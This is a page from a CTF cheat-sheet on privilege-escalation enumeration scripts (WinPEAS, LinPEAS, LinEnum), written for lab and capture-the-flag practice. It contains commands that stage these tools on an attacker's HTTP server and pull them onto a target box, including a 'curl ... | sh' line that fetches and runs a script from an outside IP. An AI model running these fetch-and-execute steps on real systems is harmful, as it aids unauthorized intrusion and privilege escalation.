CTF All The Things
  • CTF All The Things
  • Useful Stuff
    • Bash-fu
    • Bash mkdir and cd
    • Upgrade Shell
    • Static Binaries
  • Discovery & Scanning
    • NMAP
    • Gobuster
    • SMB
    • SNMP
    • SQLMap
    • Hydra
    • Nikto
    • WPScan
    • Joomla
    • TCPDump
  • Gaining Access
    • Remote Desktop
    • Evil-WinRM
    • Reverse Shells
    • Web Shells
    • SSH Port Forwarding
  • Enumeration & Exploitation
    • Things To Check First
    • Enumeration Scripts
    • Capabilties
    • SUID Binaries
    • Active Services
    • Port Enumeration
    • Steganography
    • Cracking Hashes
  • Reversing
  • Exfiltration
    • Netcat Redirect
    • SSH/SCP
    • Bash wget
    • HTTP Server
  • Maintaining Access
  • Pencer CTF Blog
Powered by GitBook
On this page
Edit on GitHub
  1. Enumeration & Exploitation

Enumeration Scripts

PreviousThings To Check FirstNextCapabilties

Last updated 2 years ago

PEASS-ng - Privilege Escalation Awesome Scripts SUITE new generation

This is the go to script I use at the moment. Frequently updated, available here on GitHub:

WinPEAS

wget https://github.com/carlospolop/PEASS-ng/releases/download/20220731/winPEASx64.exe
wget https://github.com/carlospolop/PEASS-ng/releases/download/20220731/winPEAS.bat

Pull to Windows box and execute one-liner:

PowerShell Invoke-WebRequest -Uri http://10.14.6.200:8000/winPEASx64.exe -Outfile winpeas.exe

LinPEAS

wget https://github.com/carlospolop/PEASS-ng/releases/download/20220731/linpeas_linux_amd64
wget https://github.com/carlospolop/PEASS-ng/releases/download/20220731/linpeas.sh

LinEnum

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

python -m SimpleHTTPServer 8000
Serving HTTP on 0.0.0.0 port 8000 ...

Switch to box pull over and execute:

curl http://10.9.17.195:8000/LinEnum.sh | sh

is getting a bit old but still useful:

LinEnum
GitHub - carlospolop/PEASS-ng: PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)GitHub
Logo